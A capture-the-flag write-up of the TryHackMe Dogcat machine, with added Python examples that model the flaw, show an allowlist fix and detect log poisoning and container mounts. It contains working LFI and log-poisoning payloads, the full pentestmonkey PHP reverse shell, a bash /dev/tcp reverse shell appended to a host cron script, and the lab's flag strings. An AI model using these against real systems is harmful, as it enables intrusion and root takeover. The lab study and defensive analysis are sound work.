THM Platform | Dogcat Machine Writeup

admin, 2024-05-04 07:26:41

Information gathering

Gather information with nmap:
┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sV -sC -A 10.10.192.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 03:33 EDT
Nmap scan report for 10.10.192.87
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.40 seconds
The port scan shows the target exposes SSH (22) and HTTP (80). Visit the website.

The site has only two buttons, pointing to /?view=dog and /?view=cat respectively. A quick look at how they are handled:

The application only calls include when the view parameter contains "dog" or "cat", and it appends .php to the supplied name. That is a local file inclusion (LFI) vulnerability.
Directory brute-forcing
Directory brute-forcing turns up flag.php. Because an included PHP file is executed rather than displayed, read its source through the php://filter wrapper: base64-encoding the stream stops PHP from interpreting it and returns the raw text.
┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u 10.10.230.77 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,html,php,js,zip -t 50  -q
/index.php            (Status: 200) [Size: 418]
/.html                (Status: 403) [Size: 277]
/cat.php              (Status: 200) [Size: 26]
/flag.php             (Status: 200) [Size: 0]
/cats                 (Status: 301) [Size: 311] [--> http://10.10.230.77/cats/]
/dogs                 (Status: 301) [Size: 311] [--> http://10.10.230.77/dogs/]
/dog.php              (Status: 200) [Size: 26]
Construct the payload. The cat/ prefix satisfies the dog/cat substring check, ../ backs out of it again, and the server appends .php for us:
?view=php://filter/convert.base64-encode/resource=cat/../flag

Decoding the base64 gives flag1:
┌──(kali㉿kali)-[~/桌面]
└─$ echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=" | base64 -d
<?php
$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"
?>
Source analysis
Use the same payload against index to dump the site's source:
┌──(kali㉿kali)-[~/桌面]
└─$ echo "<base64 omitted>" | base64 -d
<!DOCTYPE HTML>
<html>
<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>
The line include $_GET['view'] . $ext shows that the file extension comes from the ext parameter and only defaults to .php when ext is absent. Passing an empty ext (&ext=) therefore lets us include any file, with one remaining constraint: the view value must still contain "dog" or "cat" somewhere, which a cat/../ prefix satisfies.
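To make the two conditions concrete (the dog/cat substring check and the ext suffix), here is a Python model of the vulnerable include logic next to an allowlist version, plus the php://filter payload builder and a decoder for the response. It is an added example, not code from the room or the original post. The document root /var/www/html is an assumption inferred from the three ../ needed to reach /var/log later in the writeup, and the sample response body is constructed around the base64 flag.php dump shown above.

```python
import base64
import posixpath
import re

WEBROOT = "/var/www/html"  # assumption: inferred from the traversal depth used on the page


def contains_str(s, sub):
    """Mirror of the page's containsStr(): strpos($str, $substr) !== false."""
    return sub in s


def vulnerable_resolve(view, ext=".php", webroot=WEBROOT):
    """Model of `include $_GET['view'] . $ext` behind the dog/cat check.

    Returns the path PHP would open, or None if the substring check rejects it.
    PHP resolves the '..' components lexically, so 'cat' need not exist as a
    directory (the page's cat/../flag payload relies on that). Stream wrappers
    such as php://filter are handed to include unchanged.
    """
    if not (contains_str(view, "dog") or contains_str(view, "cat")):
        return None
    target = view + ext
    if "://" in target:
        return target
    return posixpath.normpath(posixpath.join(webroot, target))


ALLOWED_VIEWS = {"dog": "dog.php", "cat": "cat.php"}


def hardened_resolve(view, webroot=WEBROOT):
    """Allowlist fix: user input selects a key; it never becomes part of a path."""
    filename = ALLOWED_VIEWS.get(view)
    return None if filename is None else posixpath.join(webroot, filename)


def filter_payload(resource):
    """view= value that dumps a PHP file's source as base64 instead of executing it."""
    return "php://filter/convert.base64-encode/resource=cat/../" + resource


def decode_filter_output(body):
    """Pull the base64 blob that follows 'Here you go!' out of the response and decode it."""
    m = re.search(r"Here you go!([A-Za-z0-9+/=]+)", body)
    if m is None:
        raise ValueError("no base64 payload in response")
    return base64.b64decode(m.group(1)).decode()


# Constructed response fragment; the base64 is the flag.php dump shown on the page.
SAMPLE_RESPONSE = (
    '<a href="/?view=cat"><button id="cat">A cat</button></a><br>'
    "Here you go!PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo="
    "    </div></body>"
)

if __name__ == "__main__":
    for view, ext in (("cat", ".php"), ("cat/../flag", ".php"),
                      ("cat/../../../../etc/passwd", ""), ("flag", "")):
        print(f"view={view!r} ext={ext!r} -> {vulnerable_resolve(view, ext)}"
              f" | hardened: {hardened_resolve(view)}")
    print(filter_payload("flag"))
    print(decode_filter_output(SAMPLE_RESPONSE))
```

The point of hardened_resolve is that the fix is not a better substring filter: once user input is concatenated into an include path, "..", wrappers and the extension trick all stay in play, so the input has to become a lookup key instead.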

Read /etc/passwd directly with the same cat/../ traversal and an empty ext:

/etc/passwd shows no ordinary users, so the original idea of logging in over SSH with a weak password is out. Going back to the nmap result, the target runs Apache, so the next thing to try is including the Apache access log (log poisoning).

Construct the payload (three ../ from the document root land in /var, so the path resolves to /var/log/apache2/access.log):

curl "http://10.10.28.150/?view=cat/../../../log/apache2/access.log&ext="
<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        Here you go!10.18.9.239 - - [26/Apr/2024:06:25:53 +0000] "GET / HTTP/1.1" 200 537 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
10.18.9.239 - - [26/Apr/2024:06:25:54 +0000] "GET /style.css HTTP/1.1" 200 698 "http://10.10.28.150/" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
10.18.9.239 - - [26/Apr/2024:06:25:54 +0000] "GET /favicon.ico HTTP/1.1" 404 491 "http://10.10.28.150/" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
access.log records each visitor's IP, timestamp, request method (GET), request path, status code and User-Agent.
Because the User-Agent is written into the log verbatim, a one-line PHP webshell sent in that header lands in access.log, and including the log through the LFI executes it.

Connect with AntSword (蚁剑) and find flag2 in the www directory.
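As a defensive counterpart to the poisoning step, here is an added Python example (not from the original post) that parses combined-format lines like the ones dumped above and flags both the poisoning request and the follow-up include. The first three sample lines are the benign requests from the page; the last two are constructed to show what the attack leaves behind in the log.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format, matching the access.log lines shown on the page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Strings that have no business appearing in a User-Agent, Referer or URL.
PHP_MARKERS = ("<?php", "<?=", "eval(", "system(", "passthru(", "shell_exec(")


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Findings for one parsed entry: poisoning attempts and log-include triggers."""
    findings = []
    # Decode once more than the logger did so double-encoded payloads are caught too.
    blob = unquote(entry["ua"] + entry["referer"] + entry["target"])
    if any(marker in blob for marker in PHP_MARKERS):
        findings.append("php-in-log-fields")
    params = parse_qs(urlsplit(entry["target"]).query, keep_blank_values=True)
    for value in params.get("view", []):
        value = unquote(value)
        if "../" in value or "://" in value:
            findings.append("lfi-style-view")
        if "/log/" in value or value.endswith(".log"):
            findings.append("log-file-include")
    if params.get("ext") == [""]:
        findings.append("empty-ext")  # defeats the .php suffix, as shown above
    return findings


def scan(log_text):
    """Return (ip, findings, line) for every suspicious line in log_text."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append((entry["ip"], findings, line))
    return hits


# Constructed sample: the first three lines are the benign requests from the page;
# the last two are what a poisoning request and the follow-up include look like.
SAMPLE_LOG = "\n".join([
    '10.18.9.239 - - [26/Apr/2024:06:25:53 +0000] "GET / HTTP/1.1" 200 537 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"',
    '10.18.9.239 - - [26/Apr/2024:06:25:54 +0000] "GET /style.css HTTP/1.1" 200 698 "http://10.10.28.150/" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"',
    '10.18.9.239 - - [26/Apr/2024:06:25:54 +0000] "GET /favicon.ico HTTP/1.1" 404 491 "http://10.10.28.150/" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"',
    '10.18.9.239 - - [26/Apr/2024:06:31:10 +0000] "GET / HTTP/1.1" 200 537 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.18.9.239 - - [26/Apr/2024:06:31:12 +0000] "GET /?view=cat/../../../log/apache2/access.log&ext=&cmd=id HTTP/1.1" 200 2048 "-" "curl/8.5.0"',
])

if __name__ == "__main__":
    for ip, findings, line in scan(SAMPLE_LOG):
        print(ip, findings, line[:80])
```

The two hits come from the same client a couple of seconds apart, which is the pattern to alert on: a PHP tag in a header field followed by a request whose view parameter points at a log file with ext emptied out.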

Getshell
Upload a reverse shell (shell.php, the pentestmonkey php-reverse-shell with the listener IP and port changed):
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.18.9.239';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>
Start a listener on port 1234, then request the uploaded file through the include to get a shell.

Privilege escalation
Check what can be run with sudo:
$ sudo -l
Matching Defaults entries for www-data on b6d614bbefa9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on b6d614bbefa9:
    (root) NOPASSWD: /usr/bin/env
env may run as root without a password, and env simply executes whatever program it is given, so it hands over a root shell:
sudo env /bin/sh
The escalation command is listed on GTFOBins: https://gtfobins.github.io/gtfobins/env/
flag3 is in /root.

Docker escape
flag4 cannot be found here because we are inside a Docker container and flag4 is on the host. None of the writeups I read explain how to tell that you are in a container, so here is a short summary based on this article:
https://www.freebuf.com/articles/container/242763.html
1. Does /.dockerenv exist?

Inside Docker: ls -alh /.dockerenv shows the file.

Outside Docker: there is no .dockerenv file.

2. Check the cgroup of PID 1

Inside Docker: cat /proc/1/cgroup shows entries under a /docker/<container-id> path.

Outside Docker: cat /proc/1/cgroup shows the host's normal hierarchy with no docker path.

Running these checks on the target confirms that we are inside a Docker container. The hostname b6d614bbefa9 in the sudo output above is another giveaway: Docker sets a container's hostname to the first 12 characters of its container ID.

Poking around the filesystem, /opt/backups contains backup.sh with the following content:
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
The path /root/container refers to the host's filesystem, so this looks like a periodic backup run by the host, and /opt/backups should be a directory shared with the host. Start a listener on port 6666, then append a reverse shell command to the script:
echo 'bash -i >& /dev/tcp/10.18.9.239/6666 0>&1' >> backup.sh
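The container checks above and the hunt for a host-shared directory that led to /opt/backups can be automated from /proc. The following is an added Python example, not part of the original post. The /proc trees it runs against are constructed: the container ID b6d614bbefa9 is borrowed from the hostname in the sudo output, while the mount IDs and device numbers are made up. It also covers the cgroup v2 case, where /proc/1/cgroup only shows 0::/ inside the container and the page's second check comes back empty.

```python
import os
import tempfile


def _read(path):
    """Text of a file, or '' when it is missing, so one absent file never aborts the rest."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""


def _parse_mountinfo(text):
    """Parse /proc/<pid>/mountinfo lines (field layout from proc(5))."""
    mounts = []
    for line in text.splitlines():
        if " - " not in line:
            continue
        left, right = line.split(" - ", 1)
        lf, rf = left.split(), right.split()
        if len(lf) < 6 or len(rf) < 2:
            continue
        mounts.append({
            "root": lf[3],  # path within the source fs; not '/' means a subtree was bound in
            "mountpoint": lf[4],
            "rw": "rw" in lf[5].split(","),
            "fstype": rf[0],
        })
    return mounts


def container_indicators(root="/"):
    """Evidence that PID 1 lives in a Docker container; `root` points the checks at a tree."""
    found = []
    if os.path.exists(os.path.join(root, ".dockerenv")):
        found.append("dockerenv")
    # On cgroup v2 hosts /proc/1/cgroup is just '0::/' inside the container,
    # so this check (the page's second one) can legitimately find nothing.
    if "/docker/" in _read(os.path.join(root, "proc/1/cgroup")):
        found.append("cgroup-docker-path")
    mounts = _parse_mountinfo(_read(os.path.join(root, "proc/1/mountinfo")))
    if any(m["mountpoint"] == "/" and m["fstype"] == "overlay" for m in mounts):
        found.append("overlay-rootfs")
    if any(m["root"].startswith("/var/lib/docker/containers/") for m in mounts):
        found.append("docker-managed-etc-files")  # hostname/hosts/resolv.conf bind mounts
    return found


PSEUDO_FS = {"proc", "sysfs", "cgroup", "cgroup2", "tmpfs", "devpts", "mqueue", "overlay", "devtmpfs"}


def host_bind_mounts(root="/"):
    """(host path, mount point, writable) for directories bound in from the host."""
    hits = []
    for m in _parse_mountinfo(_read(os.path.join(root, "proc/1/mountinfo"))):
        if m["fstype"] in PSEUDO_FS or m["root"] == "/":
            continue
        if m["root"].startswith("/var/lib/docker/"):
            continue  # Docker's own per-container files, not an operator volume
        hits.append((m["root"], m["mountpoint"], m["rw"]))
    return hits


def build_sample_tree(base, kind):
    """Write a constructed /proc-style tree (not captured from the target) under `base`."""
    os.makedirs(os.path.join(base, "proc", "1"))
    if kind.startswith("container"):
        open(os.path.join(base, ".dockerenv"), "w").close()
        cgroup = "0::/\n" if kind == "container-cgroup2" else "12:pids:/docker/b6d614bbefa9\n"
        mountinfo = (
            "23 0 0:20 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/A\n"
            "24 23 0:21 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw\n"
            "25 23 8:1 /var/lib/docker/containers/b6d614bbefa9/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw\n"
            "26 23 8:1 /root/container/backup /opt/backups rw,relatime - ext4 /dev/sda1 rw\n"
        )
    else:
        cgroup = "0::/init.scope\n"
        mountinfo = (
            "22 0 8:1 / / rw,relatime - ext4 /dev/sda1 rw\n"
            "23 22 0:4 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw\n"
        )
    for name, text in (("cgroup", cgroup), ("mountinfo", mountinfo)):
        with open(os.path.join(base, "proc", "1", name), "w") as f:
            f.write(text)


def demo():
    """Run both checks over the three constructed trees; returns {kind: (indicators, binds)}."""
    results = {}
    for kind in ("container-cgroup1", "container-cgroup2", "host"):
        with tempfile.TemporaryDirectory() as d:
            build_sample_tree(d, kind)
            results[kind] = (container_indicators(d), host_bind_mounts(d))
    return results


if __name__ == "__main__":
    print("this process:", container_indicators(), host_bind_mounts())
    for kind, (indicators, binds) in demo().items():
        print(kind, indicators, binds)
```

Run with no arguments on the target, container_indicators() answers the "am I in Docker?" question and host_bind_mounts() lists every writable directory that is really a host path, which is exactly the /opt/backups discovery without having to browse the filesystem by hand.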

A shell comes back within a minute.

Read flag4.

Finally, confirm that backup.sh really is run on a schedule. The host's root crontab runs it every minute, and launch.sh shows how the directory gets into the container: -v /root/container/backup:/opt/backups bind-mounts root's backup directory into the container. Because the container's root is not remapped to an unprivileged host user, a write to /opt/backups by root inside the container is a write to /root/container/backup by host root, which is why appending to the script works.
root@dogcat:~/container/backup# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
* * * * * /root/container/backup/backup.sh
@reboot /root/container/launch.sh
root@dogcat:~/container/backup# cat launch.sh
#!/bin/bash
docker run -d -p 80:80 -v /root/container/backup:/opt/backups --rm box

Originally published on the WeChat official account 极星信安: THM平台|Dogcat靶机记录

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site accepts none. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; see the home page for contact details).
Reposted at CN-SEC (please keep this link when reposting): https://cn-sec.com/archives/2706243.html
